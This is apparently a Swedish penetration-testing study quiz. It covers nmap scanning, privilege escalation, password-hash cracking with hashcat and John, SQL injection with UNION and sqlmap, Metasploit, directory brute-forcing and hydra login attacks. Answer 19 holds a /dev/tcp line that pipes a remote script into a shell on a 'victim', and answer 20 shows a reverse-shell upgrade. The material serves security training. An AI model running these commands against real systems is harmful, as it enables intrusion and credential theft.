Penetrationstestning

Question 1

Vilket protokoll måste alltid en host svara på?

Answer 1

ARP (Dock endast på lokala subnätet)

Question 2

Vilka portar skannar Nmap med följande kommando?

Nmap 10.0.0.1

Answer 2

De 1000 VANLIGASTE portarna.

Question 3

Vilken option ska du använda med Nmap för att skanna alla portar?

Answer 3

-p-

Question 4

Vad betyder optionerna -sV och -sC i nmap?

Answer 4

Optionen -sV är “Version detection” d.v.s Banner
grabbing.

Exempelvis följande:22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

Optionen -sC är script d.v.s kör anpassade script mot hosten för att få ut mer info. Används exempelvis för att hitta sårbarheter eller möjligheter att logga in anonymt utan lösenord på en tjänst.

Question 5

Default så scannar nmap endast tcp-portar. Hur gör du för att scanna udp-portar?

Answer 5

Använd optionen -sU. Denna tar dock lång tid och scannar de 1000 vanligaste portarna.

Att scanna alla portar på en host tar mycket lång tid. Att scanna ett helt nät tar ännu längre tid.

Question 6

Vilket kommando ger dig en snabb överblik över dina rättigheter i /etc/sudoers?

Answer 6

sudo -l

Question 7

Vilken av följande binärfiler är möjlig att utnyttja för privilege escalation?

/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/cp

Answer 7

/usr/bin/cp

Tips är GTFOBins för att kolla detta.

Question 8

I /etc/shadow-filen hittar du ett hastat lösenord som börjar med $1$.

Vilken form av hash är detta?

Answer 8

En MD5-hash (unix).

Question 9

I /etc/shadow-filen hittar du följande hash:
$1$h6k3X5db$pp8WQ5R5YYL5bNyQj2wP70

Förklara vad de olika fälten separerade med dollartecken indikerar.

Answer 9

$id$salt$krypteradtext

id är den formen av hash det är.

Question 10

I /etc/shadow-filen hittar du ett hastat lösenord som börjar med $6$.

Vilken form av hash är detta?

Answer 10

En SHA512-hash.

Question 11

Hashcat är ett verktyg för att räkna ut hashar. Vad indikerar -m 0 i följande kommando?

hashcat -m 0 -a 0 hashar.txt /usr/share/wordlists/rockyou.txt

Answer 11

-m 0 anger vilken typ av hash vi crackar. I detta fallet en md5-hash.

Question 12

Hashcat är ett verktyg för att räkna ut hashar. Vad indikerar -a 0 i följande kommando?

hashcat -m 0 -a 0 hashar.txt /usr/share/wordlists/rockyou.txt

Answer 12

Detta indikerar att det är en dictionary attack, eller “straight mode”.

Hashcat räknar här endast ut hasharna av orden i ordlistan och jämför med dina hashar i filen ”hashar.txt”. Detta är en metod som går snabbt även med en lång lista som rockyou.txt.

Question 13

Hashcat kan användas för att genomföra en s.k. Mask Attack.

Hur fungerar detta?

Answer 13

Provar alla kombinationer från ett givet utrymme precis som i en Brute-Force-attack, men mer specifikt. Detta sparar tid om vi vet något om lösenordet, exempelvis att det endast innehåller siffror.

Exempel:
?d = 0123456789, indikerar på att endast siffror ska användas på den angivna positionen.

Question 14

Du ska genomföra en Mask-attack med Hashcat.

Vad är de olika charsetsen kan du använda och vad betyder dessa?

Answer 14

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ 
?a = ?l?u?d?s
?b = 0x00 - 0xff

Question 15

En fil som vanligtvis går att hitta på en domän är filen robots.txt. Vad innehåller denna?

Answer 15

Robots Exclusion-protokollet är ett sätt att be crawlers och andra robotar som samlar information åt söktjänster på internet att inte besöka vissa delar av en webbplats.

Detta kan vara en intressant fil att kolla närmare på för att hitta ytterligare directories på webbplatsen.

Question 16

Vad används ”UNION” till i en SQL-injektion?

Answer 16

UNION används för att lägga till förfrågningar till vår SQL-injektions legitima fråga och kombinera informationen vi vill hämta med den tillsammans med den legitima frågan.

Question 17

Vad används följande rad till i en SQL-injektion?

UNION ALLSELECT NULL,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema=’jimmysdatabas’–

Answer 17

Hämta alla tabellnamn i databasen ”jimmysdatabas”.

Question 18

Du vill hämta data från en annan databas med hjälp av ”UNION”. Hur ska du gå till väga?

Answer 18

UNION ALLSELECT NULL,concat(kolumn1,kolumn2) FROM jimmysdatabas2.mariostabell–

Question 19

Du ska genomföra Privilege Escalation med LinPEAS.sh. Hur går du till väga för att använda det på en maskin du saknar lösenord till?

Answer 19

Du kan exempelvis genomföra följande i en katalog du alltid har skriv- och läsrättigheter i. Exempelvis /tmp.

sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.192.128.xx/80 | sh #Victim

Question 20

Du har efter mycket slit lyckats få ett Reverse Shell via netcat. Nu vill du slippa ångesten över att vara nervös över att (av ren vana) avbryta en process med ”Ctrl-C” och råka avbryta hela anslutningen.

Du vet att det finns python3 på maskinen. Vad gör du?

Answer 20

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Question 21

Vad är SQLmap?

Answer 21

Sqlmap är ett open source -penetrationstestverktyg som automatiserar processen av att upptäcka och utnyttja SQL-injektionsfel och ta över databasservrar.

Question 22

Du har följande kommando. Vad indikerar level och risk i detta fallet?

sqlmap -r filen.txt –level 5 –risk 3

Answer 22

Risk:
Standardvärdet är 1, vilket är ofarligt för de flesta SQL -injektionspunkter. Riskvärde 2 lägger till tester för tunga tidsbaserade SQL-injektioner. Värde 3 lägger till OR-baserade SQL-injektionstester.

Level:
Level 5 är den mest djupgående nivån och kommer att testa för ett mycket större antal payloads och boundaries. Detta tar dock mycket längre tid.

Question 23

Du har följande URL du tror är sårbar för en SQL-injektion. Hur löser du detta med sqlmap?

http://marioparada.eu/vuln/test.php?luckynumber=3

Answer 23

Exempelvis:

sqlmap -u ”http://marioparada.eu/vuln/test.php?luckynumber=3” –level 5 –risk 3

Question 24

Hur listar du information om de befintliga databaserna med sqlmap?

Answer 24

Lägg till –dbs i slutet för att lista databaser.

Question 25

Vad gör kommandot ”ps aux”?

Answer 25

Ger dig en överblick över vilka processer som körs och låter dig kontrollera om någon process har fler privilegier än den borde (kanske en process körs som “root” som inte borde göra det?)

Question 26

Vad är GTFOBins?

Answer 26

GTFOBins är en lista över Unix-binärer som kan användas för att kringgå säkerhetsrestriktioner i felkonfigurerade maskiner.

https://gtfobins.github.io

Question 27

Hur gör du för att köra kommandot ”whoami” med en annan användares miljö?

Answer 27

sudo -i -u användare whoami

Question 28

Vad gör ”netstat -tulpn” ?

Answer 28

Möjliggör det för dig att få en överblick av vilka portar som är öppna och vilka tjänster som använder dessa för tillfället.

Betydelse:
netstat –tcp –udp –listening –program —numeric

Question 29

Hur gör du för att visa HTTP request headers när du ska curla till en webbsida?

Answer 29

Curls -v eller –verbose option visar detta för dig på skärmen.

Question 30

Metasploit är ett lättanvänt verktyg för att använda kända sårbarheter. Vad betyder LHOST ?

Answer 30

Detta är din adress. Du ställer in detta med ”set LHOST xxx.xxx.xxx.xxx”.

Använder du en VPN så räcker det oftast med att skriva ”set LHOST tun0”, förutsatt att din VPN-anslutning använder tun0-interfacet.

Question 31

När du har valt en sårbarhet i Metasploit-konsollen finns där en förvald payload som är den troligaste att fungera. Hur gör du för att ändra payload?

Answer 31

Du kan skriva ”show payloads” för att lista alla payloads med id-nummer. Då får du upp en lista över alla payloads du kan använda. Skriv sedan ”set payload id-nummer” för att välja en annan payload, alternativt hela namnet på payloden likt följande ”set payload bla/meterpreter/reverse_python2”.

Question 32

Var i Kali kan du enkelt finna webshells?

Answer 32

/usr/share/webshells/

Question 33

Verktyget “john the ripper” kan användas för att räkna ut hashar och därmed räkna ut lösenord. Hur använder du detta verktyg för att räkna ut lm-hashar med rockyou.txt från filen lmhashar.txt?

Answer 33

john lmhashar.txt –format=LM —wordlist=/usr/share/wordlists/rockyou.txt

Question 34

Du har kommit över inloggningsuppgifter till en msql-databas på den lokala servern du är ansluten till. Vilket kommando skriver du för att välja alla rader och kolumner från tabellen ”jimmystabell” ?

Answer 34

SELECT * FROM jimmystabell

Question 35

Du har hittar en tjänst på en maskin och vill kolla upp om det finns några kända sårbarheter för denna tjänsten med searchsploit. Du läser på nätet att det nu finns ny känd exploit med ett CVE ID men du hittar inte denna när du söker efter denna med searchsploit.

Vad kan vara anledningen?

Answer 35

Du har inte uppdaterat databasen.

searchsploit -u

Question 36

Du har hittat en exploit med searchsploit som du skulle vilja använda. Hur gör du för att kopiera till katalogen du står i?

Answer 36

Med -m optionen (mirror). Exempelvis:

searchsploit -m /path/till/exploit/34564.py

Question 37

Du har hittat en intressant sida du kan logga in på. Du vet att användarnamnet är ”admin” och du har en lösenordslista du vill använda med intrudern i BurpSuite för att försöka logga in. Det går dock riktigt långsamt för att du inte har betalversionen.

Hur gör du?

Answer 37

Använd tillägget ”Turbointruder” och använd ett basic script där du byter ut sökvägen till din ordlista i scriptet och placerar ”%s” på positionen där du vill placera lösenorden i requesten.

Question 38

Du använder Turbointruder i BurpSuite för att försöka logga in via ett formulär. Du har en lista med användarnamn och en med lösenord.

Hur gör du för att lösa detta enkelt?

Answer 38

Välj det färdiga scriptet ”multiple parameters” i rullgardinen och placera ”%s” på både positionen för användarnamn och lösenord i requesten. Byt ut ordlistorna till adminlistan och lösenordslistan på rätt positioner i scriptet.

Question 39

Du ska använda verktyget Gobuster för att hitta nya directories på en domän. Vilken seclists-ordlista är lämplig för detta?

Answer 39

Någon av följande listor är bra att använda:

/usr/share/SecLists/Discovery/Web-Content/raft-large-directories.txt
/usr/share/SecLists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/SecLists/Discovery/Web-Content/raft-smal-directories.txt

Question 40

Du vill använda gobuster till att hitta en fil i en directory på domänen hemsida.se. Du använder ordlistan filer.txt och vill hitta .php och .html filer.

Hur ser syntaxen ut?

Answer 40

gobuster dir -u http://hemsida.se/path/till/ -w filer.txt -x .php,.html

Question 41

Vilket tillägg i gobuster använder du för att använda fler trådar?

Answer 41

-t

Exempelvis: -t 10

Question 42

Hur använder du gobuster för att hitta subdomänder?

Answer 42

Exempelvis med ”dns Mode”.

gobuster dns -d mario.microsoft -w common-names.txt

Question 43

Vad är hydra?

Answer 43

Hydra är en parallelliserad inloggningsknäckare som stöder många olika protokoll.

Question 44

Du hittar en maskin där du kan logga in med ssh. Du vet inget om maskinen förutom att användarnamnet är nisse42.

Hur löser du detta med hydra?

Answer 44

Det gör du inte. Du använder Axels mycket smidiga script hydran.
Länk: https://github.com/bebbenn/hydran

Alternativt: hydra -l nisse42 -P /usr/share/wordlists/vanligalösenord.txt ssh://192.168.0.1

Hydra har även stöd för bl.a. rdp, smb, telnet m.m.

Question 45

Du befinner dig i en situation där du har möjlighet att ladda upp ett Reverse Shell i en oneliner. Hur går du till väga för att hitta något lämpligt Reverse Shell?

Answer 45

Använd Felix Lineplease.

”Lineplease is a helper script (bash) designed to simplify the process of grabbing reverse shell oneliners from the web and changing them to fit whatever need. ”

Länk: https://github.com/rub3rth/lineplease

Alternativt använd PayloadsAllTheThings Reverse Shell Cheat Sheet och modifiera själv ip och port.

Question 46

Du vill använda verktyget WFUZZ till att hitta subdomäner till adressen silenta.se med listan subdomains-top1million-110000.txt.

Hur ser syntaxen ut?

Answer 46

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -p 10.0.0.3:80:HTTP -u http://FUZZ.silenta.se